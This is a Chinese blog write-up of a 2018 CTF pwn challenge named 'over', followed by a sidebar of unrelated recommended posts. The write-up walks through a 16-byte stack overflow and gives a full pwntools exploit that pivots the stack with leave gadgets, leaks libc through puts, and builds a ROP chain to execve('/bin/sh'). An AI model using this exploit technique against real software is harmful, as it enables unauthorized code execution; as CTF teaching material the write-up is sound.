2018 安恒杯 6 月 pwn - over

最新推荐文章于 2024-12-21 13:48:30 发布
原创 最新推荐文章于 2024-12-21 13:48:30 发布 · 1.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #64

本文深入解析了一种特殊的二进制漏洞利用技术,通过ROP(Return-Oriented Programming)技巧,绕过0x60字节读取限制,实现对特定程序的控制流劫持。详细步骤包括泄露栈地址、利用gadget控制寄存器及栈指针,最终构造ROP chain以执行任意代码。
部署运行你感兴趣的模型镜像

题目链接 找不到了

先用ida分析一下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  while ( sub_400676() )
    ;
  return 0LL;
}

int sub_400676()
{
  char buf; // [rsp+0h] [rbp-50h]

  memset(&buf, 0, 0x50uLL);
  putchar(62);
  read(0, &buf, 0x60uLL);
  return puts(&buf);
}

checksec
[*] '/home/hu/\xe6\x96\x87\xe6\xa1\xa3/over/over.over'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

可以看出这个程序读入最大的长度为0x60,而栈长度为0x50,所以我们最多可以覆盖到rbp 和 ret addr,无法在ret后的地址构造rop chain,所以我们rop chain放在栈上 0x50,重点要控制住rsp,使得rsp能够转移到rbp-0x50处。

  1. 泄露栈地址
  2. 算出sub_400676_ebp - 0x50
  3. 找到gadget -->  leave == mov rsp , rbp ;pop rbp
  4. 调用两次leave,使得rsp跳到 sub_400676_ebp - 0x50 处
  5. 执行rop chain

exp如下

from pwn import *
context.binary = "./over.over"

def DEBUG(cmd):
    raw_input("DEBUG: ")
    gdb.attach(io, cmd)

io = process("./over.over")
elf = ELF("./over.over")
libc = elf.libc

io.sendafter(">", 'a' * 80)
stack = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\0')) - 0x70 #泄露rbp,同时算出stack=sub_400676_rbp- 0x50
success("stack -> {:#x}".format(stack)) 
# 之所以 -0x70 是因为 rbp里面存的是 main的rbp,stacke=sub_400676_rbp-0x50=(main_rbp-0x20)-0x50
'''
ROPgadget  --binary ./over.over  --only "|pop|ret"
Gadgets information
============================================================
0x0000000000400793 : pop rdi ; ret
'''
pop_rdi_ret=0x400793

# leave 0x4006be

io.sendafter(">", flat(['99999999', pop_rdi_ret, elf.got['puts'], elf.plt['puts'], 0x400676, (80 - 40) * '1', stack, 0x4006be]))#第一个元素可以随便填,因为再次调用sub_400676时会再次把rbp覆盖不影响rsp的方向
libc.address = u64(io.recvuntil("\x7f")[-6: ].ljust(8, '\0')) - libc.sym['puts']
success("libc.address -> {:#x}".format(libc.address))


'''
$ ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --only "pop|ret"
Gadgets information
============================================================
0x00000000001306d9 : pop rdx ; pop rsi ; ret
'''
pop_rdx_pop_rsi_ret=libc.address+0x00000000001306d9
success("pop_rdx_pop_rsi_ret->{:#x}".format(pop_rdx_pop_rsi_ret))

payload=flat(['88888888', pop_rdi_ret, next(libc.search("/bin/sh")),pop_rdx_pop_rsi_ret,p64(0),p64(0), libc.sym['execve'], (80 - 7*8 ) * '2', stack - 0x30, 0x4006be])
#执行到这一步的时0x30=sub_400676_rbp-rsp
io.sendafter(">", payload)

io.interactive()

 

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

201811-Web writeup
CoolD's Blog
11-28 3295
心态炸了
201810赛RE&MISC周周练
qq_42192672的博客
11-18 3160
赛反正我是错过了,这次周周练有四道题来看看,菜鸡就该多学习 1.easytree 拖进linux,发现跑不起来,eng? file一下,结果发现是exe PEID查一下 upx壳,直接脱,拖进IDA,直接看main函数 依次分析一下函数吧,2400不知道是啥,198E里面就是欢迎我们的字符串 我们输入的的字符串长度要是15才行 最后我们运算一通之后字符串要转变为aW...
ctf pwn课件
10-06
培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。 浙江金融系
2018 - - babypie [stack partial overwrite]
ACdream
02-13 1494
明显的是缓冲区溢出呀,read函数可以多读 64位程序,开启了NX和PIE,且程序里有了system("/bin/sh") 目标:控制RIP到A3E函数即可~ 首先,要处理canary的问题~然后,覆盖返回地址~ partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址 exp如下: #!/usr/bin/e...
pwn魔法
weixin_30737433的博客
08-13 396
魔法这是比较基础的一道栈溢出;首先看下开启的防护机制Checksec magicc发现只有nx防护我们载入ida发现溢出点Buf实际溢出空间为0x16,构造expimport timefrom pwn import *p=process('./magicc')p.recvuntil('Choose!')p.sendline('4')p.recvuntil('success')payloa...
2018 -12pwn
Maxmalloc的博客
12-23 1619
Messageb0x $ file messageb0x messageb0x: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d932d2afbca74...
12 pwn ----messageb0x
qq_42192672的博客
12-24 858
这次就看了pwn题,第二个是orange,还不会,就做了下第一个 总体就是个简单的rop,但是有个坑就是题目让我们猜libc的版本到底是啥 然后我在IDA里看到了一个字符串 被坑惨了,在2.27调试了半天后来发现是2.23的,哭了 #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal...
pwn1
04-25
"pwn1" 本文主要讨论的是pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
-misc-附件资源
03-05
-misc-附件资源
2018年九赛之NewDriver
沐一 · 林 的博客
03-08 1328
2018年九赛之NewDriver 这题是复现的,用于研究 RC4 加密,首先拿到附件: . . 照例扔入 exeinfope 中查看信息: . . 32 位无壳,照例扔入 IDA32 中查看信息,有 main 函数看 main 函数:(这次就用老版7.0 IDA 来分析算了) . . 分析第一个自定义函数: . . 分析第二个自定义函数: . . 分析第三个自定义函数: . . 所以总的流程是,用户输入------>base64加密------>RC4数据初
2018-10逆向题目
10-29
2018年10赛逆向题目。
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2797
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
花式栈溢出
m0_49959202的博客
10-04 966
文章目录花式栈溢出1.原理1.1 stack pivoting1.2 栈迁移(frame faking)1.2.1 gadget介绍1.2.2 栈(payload)布置1.2.3 步骤分析stage 1:stage 2:stage 3:stage 4:stage 5:stage 6:其他栈迁移方式:1.3 Stack smash1.4 partial overwrite2.例题2.1 stack pivoting2.1.1 习题信息2.1.2 程序分析2.2 栈迁移(frame faking)2.2.1 习
2018 6
weixin_40423072的博客
09-03 1923
更一下比赛的 解析吧。的 三题web,唔,平台关了所以,链接就 随缘了! 第一题 嗯,遇到就点吧,点击的时候页面不会跳转但是还是会有反应的,如果右键打开之后会有新的路径,后面有跟一个microsoft 的教程。那 这题就是一个 注入吧 但是常规注入并不能注入进去,无奈。Redis的注入也没有,于是看了解析之后我们就很自然的可以想到MongoDB注入,怎么说呢。只要想到他就能做出来,百度一...
2024春秋 stdout
2401_88326365的博客
12-21 286
考点:文件,setvbuf缓冲区,ret2syscall,ret2csu题目给了libc文件。main函数和vlun函数存在明显的栈溢出。
[PWN]2019.2 filesystem
Hello World.c
02-24 753
之前一直玩逆向,鉴于逆向和pwn都算同一类,寒假花了点时间补了下。 由于自己太菜,被几个函数误导了好久。。。。最后到点刚好解出来,没 能来得及提交。。。被自己蠢哭了 main函数很简单,各种菜单输入匹配,一眼就看到个B4cKd0oR 可疑的很!更进去看看是啥 看到个system,那不是简单了,立马输入B4cKd0oR,键入ls命令 程序返回了服务器上的文件目录,看到一个fl...
【4.29】writeup
热门推荐
wintersun的地带
04-19 1万+
#### _writeup 以下为比赛中做出的题目MISC: SHOW ME THE FLAGCRYPTO: LAZYATTACK这一题很巧,全部的队伍里面只有我们一个队伍将其做出来。 这一题做出来完完全全是靠运气,在当我做出这一题的时候感觉是懵逼的,完全不知道是怎么回事,flag一下子就出来了而且对了,很兴奋。队友都相互说用了和出题人同一个软件,才得到的答案。结果确实是和出题人用
2018 强网 部分write up
ayg14593的博客
03-27 390
蜘蛛侠啊 misc linux tshark identity 部分指令 附件下载 https://pan.baidu.com/s/1uo0GFufTjMqR8rtBzp5PlQ 密码 2cq5 首先打开附件pcap包 茫茫多的icmp包 稍微看一下似乎每个包内容都不太一样 但是 $$START$$ 似乎暗示了什么 看看最后一个ICMP...
花式栈溢出技巧----stack pivoting/frame faking
qq_42192672的博客
10-14 1388
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/                   https://www.jianshu.com/p/c53627895330 1.stack pivoting 转移堆  以 X-CTF Quals 2016 - b0verfl0w 为例学习 #若可溢出...
WAF-HTTPS证书制作
最新发布
12-27
### 如何为WAF创建HTTPS证书 #### 准备工作 为了确保能够顺利地为WAF配置SSL/TLS证书,需要先准备好必要的材料和环境。这通常包括但不限于获取合适的SSL/TLS证书文件以及私钥文件。 对于国密SSL证书的支持,可以选择沃通提供的“SM2/RSA双证书”应用方案[^1]。这种类型的证书不仅兼容国际标准算法RSA,还支持中国国家密码管理局制定的椭圆曲线公钥密码体制——即SM2算法,从而增强了全性并满足特定行业的要求。 #### 获取SSL/TLS证书 可以通过购买商业CA签发的标准X.509格式数字证书来获得合法有效的SSL/TLS凭证。这些证书可以是普通的DV(Domain Validation),OV(Organization Validation)或者是更高全级别的EV(Extended Validation)。其中,EV SSL证书能够在浏览器中展示绿色地址栏,显著提升用户的信任感[^2]。 另外,在某些场景下也可以考虑自签名证书用于内部测试或开发环境中。不过需要注意的是,这类未经权威机构认证过的证书可能无法被客户端自动识别接受,因此仅限于封闭网络内使用。 #### 配置过程概述 一旦拥有了所需的SSL/TLS证书之后,则可以根据官方文档指导来进行具体的装操作: - **上传证书**:登录到WAF管理界面后找到相应的选项卡,按照提示上传已有的.cer/.pem格式证书链文件及.key形式保存下来的私钥。 - **启用HTTPS服务**:确认无误后再开启对应的端口监听功能,默认情况下应该是443/tcp,并指定好刚才导入的那个证书作为默认使用的那一份。 - **检查配置有效性**:最后一步是要仔细核对整个流程是否正确执行完毕,比如利用在线工具扫描目标站点看看能否正常加载网页内容的同时查看是否存在任何警告信息等异常状况。 ```bash openssl req -newkey rsa:2048 -nodes -keyout domain.key -x509 -days 365 -out domain.crt ``` 上述命令展示了如何借助OpenSSL生成一对新的RSA密钥对连同自签署的X.509 v3版本证书一起输出成两个单独文件的形式。当然这只是其中一个例子而已,实际生产环境下应当遵循正规渠道申请得到正式授权后的成品再做进一步处理。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值